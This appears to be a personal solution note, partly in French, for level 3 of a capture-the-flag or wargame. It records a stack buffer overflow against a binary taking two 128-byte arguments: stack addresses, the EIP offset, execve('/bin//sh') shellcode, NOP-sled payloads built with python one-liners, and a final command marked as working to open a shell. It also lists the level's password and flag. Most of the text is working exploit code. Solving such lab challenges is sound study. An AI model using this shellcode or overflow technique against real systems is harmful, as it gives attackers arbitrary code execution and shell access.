user : level3
pass : b130hOOfGftXUfmRZlgD

Address of buf array = 0xbffff680

Arg 1 = buf1 128 bytes
Arg 2 = buf2 128 bytes

buf = buf2 + buf1

eip is at 0xbffff78c

Address Diff between eip & buf = 10c = 268 bits


Par essai & erreur, on trouve que eip commence a b
70 + 128 + 70


ShellCode (23 bytes) :
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Buf1 :
$(python -c 'print "\x90"*68+"\x80\xf6\xff\xbf"')

Buf2 :
$(python -c 'print "\x90"*105+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

Eip se trouve a 12 bytes de buf


$(python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')




Working (opening dash shell) :
$(python -c 'print "\x90"*68+"\xc0\xf4\xff\xbf"') $(python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')

Flag : VHDY2pdYVyXi08kupbos
